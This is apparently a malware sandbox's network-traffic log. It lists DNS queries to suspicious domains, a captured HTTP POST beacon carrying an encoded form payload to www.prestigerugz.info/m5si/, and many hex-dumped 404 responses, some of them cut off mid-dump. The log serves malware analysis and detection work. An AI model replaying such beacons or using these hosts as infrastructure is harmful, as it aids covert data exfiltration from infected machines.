Source: global traffic	DNS traffic detected: DNS query: www.buckser.info
Source: global traffic	DNS traffic detected: DNS query: www.jijievo.site
Source: global traffic	DNS traffic detected: DNS query: www.44ynh.top
Source: global traffic	DNS traffic detected: DNS query: www.setwayidiomas.online
Source: global traffic	DNS traffic detected: DNS query: www.75178.club
Source: global traffic	DNS traffic detected: DNS query: www.taxitayninh365.site
Source: global traffic	DNS traffic detected: DNS query: www.ontherise.top
Source: global traffic	DNS traffic detected: DNS query: www.nb-shenshi.buzz

Source: unknown

HTTP traffic detected: POST /m5si/ HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 203Origin: http://www.prestigerugz.infoReferer: http://www.prestigerugz.info/m5si/User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0Data Raw: 62 6c 4f 34 68 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 44 61 2f 43 64 75 4d 77 54 70 51 53 74 73 4d 76 70 62 67 4c 59 75 58 71 45 66 46 47 57 77 46 56 77 3d 3d Data Ascii: blO4h0=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzDa/CduMwTpQStsMvpbgLYuXqEfFGWwFVw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 20:46:35 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 20:46:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 10 Jan 2025 20:46:40 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Fri, 10 Jan 2025 20:46:42 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:47:20 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Jan 2025 20:47:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Jan 2025 20:47:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 